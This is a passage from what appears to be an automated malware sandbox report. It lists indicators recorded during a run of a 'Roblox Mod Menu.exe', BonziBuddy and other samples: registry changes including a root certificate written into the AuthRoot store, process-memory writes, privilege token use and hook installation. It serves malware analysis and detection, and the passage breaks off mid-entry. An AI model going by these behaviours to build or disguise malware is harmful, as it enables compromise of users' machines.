\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502} BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8E20FD10-1BEB-11CE-80FB-0000C0C14E92} BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\FileType\{D45FD300-5C6E-11D1-9EC1-00C04FD7081F}\0\ = "0,4,FFFFFFFF,C4ABCDAB" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Applications\crashreporter.exe\IsHostApp = "0" crashreporter.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ActiveSkin.SkinPanel\CurVer\ = "ActiveSkin.SkinPanel.1" BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8E3867AA-8586-11D1-B16A-00C0F0283628}\ProxyStubClsid32 BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D45FD31B-5C6E-11D1-9EC1-00C04FD7081F}\ProgID\ = "Agent.Control.2" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A7B93CA0-7B81-11D0-AC5F-00C04FD97575}\TypeLib\Version = "2.0" AgentSvr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C74190B6-8589-11D1-B16A-00C0F0283628}\ToolboxBitmap32 BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE3-1BF9-11D2-BAE8-00104B9E0792}\Implemented Categories\{1D06B600-3AE3-11CF-87B9-00AA006C8166} BonziBuddy432.exe -
Processes:
Roblox Mod Menu.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A Roblox Mod Menu.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Roblox Mod Menu.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d4624030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e76200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb65809000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Roblox Mod Menu.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e260f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Roblox Mod Menu.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 5c000000010000000400000000080000040000000100000010000000324a4bbbc863699bbe749ac6dd1d4624030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e76200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb65809000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e650190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Roblox Mod Menu.exe -
NTFS ADS 3 IoCs
Processes:
firefox.exedescription ioc process File created C:\Users\Admin\Downloads\Bon.zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Bon(1).zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Roblox.Mod.Menu.zip:Zone.Identifier firefox.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
Explorer.EXEpid process 3220 Explorer.EXE 3220 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exeExplorer.EXEpid process 616 5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe 616 5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3220 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 652 -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe7C3.exe260D.exetcswgbapid process 616 5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe 4008 7C3.exe 5292 260D.exe 5808 tcswgba -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
Processes:
msedge.exepid process 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe 5096 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Explorer.EXEdescription pid process Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
Explorer.EXEmsedge.exebuild3.exefirefox.exeAgentSvr.exefirefox.exepid process 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 1616 msedge.exe 5656 build3.exe 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 5496 firefox.exe 5496 firefox.exe 5496 firefox.exe 5496 firefox.exe 3220 Explorer.EXE 3220 Explorer.EXE 2496 AgentSvr.exe 3220 Explorer.EXE 3220 Explorer.EXE 2496 AgentSvr.exe 3088 firefox.exe 3088 firefox.exe 3088 firefox.exe 3088 firefox.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
Explorer.EXEfirefox.exepid process 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 5496 firefox.exe 5496 firefox.exe 5496 firefox.exe 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE -
Suspicious use of SetWindowsHookEx 34 IoCs
Processes:
Explorer.EXEfirefox.exeBonziBuddy432.exeRoblox Mod Menu.exetv_enua.exeAgentSvr.exeBonziBDY_4.EXEfirefox.exefirefox.exefirefox.exefirefox.exepid process 3220 Explorer.EXE 5496 firefox.exe 5496 firefox.exe 5496 firefox.exe 5496 firefox.exe 5496 firefox.exe 5496 firefox.exe 5496 firefox.exe 3220 Explorer.EXE 3220 Explorer.EXE 4932 BonziBuddy432.exe 3172 Roblox Mod Menu.exe 368 tv_enua.exe 3300 AgentSvr.exe 5496 firefox.exe 5496 firefox.exe 5496 firefox.exe 5496 firefox.exe 5496 firefox.exe 5496 firefox.exe 5496 firefox.exe 5496 firefox.exe 5496 firefox.exe 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 5424 BonziBDY_4.EXE 5424 BonziBDY_4.EXE 3088 firefox.exe 5760 firefox.exe 5132 firefox.exe 3316 firefox.exe 3220 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3220 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 1616 wrote to memory of 1080 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 1080 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 3064 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 2268 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 2268 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 msedge.exe msedge.exe PID 1616 wrote to memory of 5272 1616 